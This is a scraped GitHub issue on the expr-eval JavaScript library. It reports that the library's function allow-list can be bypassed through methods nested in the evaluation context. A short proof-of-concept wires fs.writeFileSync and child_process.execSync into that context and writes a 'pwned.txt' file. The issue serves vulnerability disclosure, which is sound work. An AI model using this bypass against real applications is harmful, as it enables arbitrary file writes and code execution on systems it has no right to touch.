expr-eval icon indicating copy to clipboard operation
expr-eval copied to clipboard

Published 20 hours ago verified publisher icon silentmatt

Report security vulnerability

Open huydoppaz opened this issue 4 weeks ago • 9 comments

Bypass : https://github.com/silentmatt/expr-eval/pull/288

The patch introduced an "allow-list" security model and an isAllowedFunc function to validate callable functions. However, the isAllowedFunc function still permits functions that are members of objects within the values context passed to parser.evaluate(). If an application inadvertently or intentionally includes an object containing dangerous methods (e.g., fs.writeFileSync, child_process.execSync) in the values object, an attacker can invoke these methods via expressions, leading to arbitrary code execution.

POC :

'use strict';

var assert = require('assert');
var Parser = require('expr-eval-fork').Parser;
var fs = require('fs');
var childProcess = require('child_process');
var context = {
  write: (path, data) => fs.writeFileSync(path, data),
  cmd: (cmd) => console.log('Executing:', cmd),
  exec: childProcess.execSync
};

var baoquanh = {
    test: context
}

var parser = new Parser();

parser.evaluate('test.write("pwned.txt","Hello!")', baoquanh);

huydoppaz avatar Nov 11 '25 08:11 huydoppaz